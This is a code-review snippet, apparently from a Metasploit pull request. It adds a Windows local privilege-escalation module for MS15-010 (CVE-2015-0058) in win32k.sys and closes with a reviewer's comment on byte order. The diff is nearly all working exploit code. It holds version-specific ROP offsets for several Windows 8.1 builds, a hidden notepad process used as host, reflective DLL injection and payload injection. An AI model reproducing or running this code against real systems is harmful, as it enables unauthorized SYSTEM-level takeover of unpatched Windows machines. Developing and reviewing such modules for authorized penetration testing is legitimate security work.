modules/exploits/windows/local/ms15_010_destroy_cursor.rb

```diff
@@ -0,0 +1,180 @@
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    # Windows 7 and 8.0 are not supported
+    return Exploit::CheckCode::Safe if build == 7600
+    return Exploit::CheckCode::Safe if build == 7601
+    return Exploit::CheckCode::Safe if build == 9200
+
+    if [9600].include?(build)
+
+      case revision
+
+      when 17353
+        @rop_offset = 0x198534
+      when 17393
+        @rop_offset = 0x198534
+      when 17261
+        # not verified
+        @rop_offset = 0x1A0904
+      when 17200
+        @rop_offset = 0x1A0980
+      when 17031
+        @rop_offset = 0x1A09EC
+      else
+        # should we return Safe ? wrong offset leads to crash
+        return Exploit::CheckCode::Safe
+      end
+
+      vprint_status("using 0x#{@rop_offset.to_s(16)} as rop offset")
+
+      return Exploit::CheckCode::Detected
+
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    if target.arch.first == ARCH_X86_64
+      dll_file_name = 'cve-2015-0058.x64.dll'
+    end
+
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0058', dll_file_name)
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    info_struct = process.memory.allocate(16, PROT_READ | PROT_WRITE)
+
+    info = ""
+    info << [payload_mem].pack('Q')
```

Comment:
Please use `Q<` otherwise this exploit won't work on the offchance someone is running from a big endian system :)